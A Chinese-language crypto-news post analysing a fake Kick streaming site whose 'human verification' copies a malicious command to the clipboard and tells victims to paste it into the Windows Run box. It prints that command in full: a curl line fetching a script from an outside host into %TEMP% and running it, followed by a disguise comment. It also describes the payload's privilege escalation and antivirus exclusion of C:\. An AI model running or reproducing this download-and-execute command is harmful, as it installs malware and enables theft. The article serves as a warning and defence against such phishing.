钓鱼!钓鱼!又见钓鱼木马!!!

CN
6小时前

上午在几个群里看到一个聊天记录,讲的是一位老哥上了假的钓鱼网站导致电脑中了木马资产被盗。我们来分析一下他被盗的流程。

钓鱼!钓鱼!又见钓鱼木马!!!

如上聊天记录所示,他当时是访问了一个假的kick网站,网址如下:https://kick.com.im/

重要提醒:此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!

当我们访问此网站时,发现会出现一个是否是人类的验证,我们点击进行验证,会弹出以下提示:

钓鱼!钓鱼!又见钓鱼木马!!!

我们来解释上图是让你做什么操作:

1、按下Windows+R打开运行对话框

Windows+R是windows系统下的一个快键命令,用来快速的打开运行对话框的。此处就是让你准备执行恶意脚本文件。

2、按下CTRL+V粘贴验证文本

地球人都知道CTRL+V是用来粘贴的,在这一步大家是不是有个疑问,想CTRL+V之前得先CTRL+C进行复制呀,为什么没有复制直接就让粘贴了呢?

我们看看钓鱼网站前端的代码:

钓鱼!钓鱼!又见钓鱼木马!!!

秘密就在这里,记得我们刚访问网站时让我们验证是否是人类,验证时得点鼠标,上面这段js代码就是检测鼠标的点击事件,当发现鼠标点击时就把恶意脚本自动的复制到粘贴板中,这时候不用CTRL+C就能直接CTRL+V了。

那粘贴板中的恶意代码是什么呢?

cmd /c "curl -k -L -Sshttps://hcaptcha.ru/r-o "%TEMP%\1.cmd" && "%TEMP%\1.cmd"" # Press OK or ENTER to complete verification. By pressing OK you confirm you are not a robot.

上面的代码意思是从https://hcaptcha.ru/r重要提醒:此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!)下载文件存到临时目录中,文件的名字叫“1.cmd”,然后执行此文件。

打开下载后的文件发现是如下的代码:

钓鱼!钓鱼!又见钓鱼木马!!!

这段恶意代码首先会检查是否有管理员权限,当有管理员权限后会尝试将此脚本提升为管理员权限 。

第二部分那一坨代码用Base64进行了编码,当解码后发现功能是将C:\排除在防病毒扫描之外。这步的目的是告诉杀毒软件“C:|你就不要扫描啦!”,这样当木马在C盘执行时就不会被杀毒软件发现。

第三部分代码gpt也没有解析出来,大致的用处就是从某一网站上下载木马到C盘,然后执行木马,这里就需要@evilcos老师等各位安全专家进行具体的分析。

针对上述钓鱼骗局我们可以得到如下的经验 :

1、访问任何不熟悉的网址前一定要多验证网址的正确性。像上文中的受害者把钓鱼网站当成了kick直播的网址,kick的官方网址是https://kick.com/,如果受害者去google上搜索或者询问gpt也就不会上当。

2、执行每一步操作前都要慎重,要想明白这步操作的用处是什么,当我们不懂或者不清楚时,要善于用GPT 等AI 工具。

Web3处处是陷阱,希望大家都能避开各种坑。

免责声明:本文章仅代表作者个人观点,不代表本平台的立场和观点。本文章仅供信息分享,不构成对任何人的任何投资建议。用户与作者之间的任何争议,与本平台无关。如网页中刊载的文章或图片涉及侵权,请提供相关的权利证明和身份证明发送邮件到support@aicoin.com,本平台相关工作人员将会进行核查。

分享至:
APP下载

X

Telegram

Facebook

Reddit

复制链接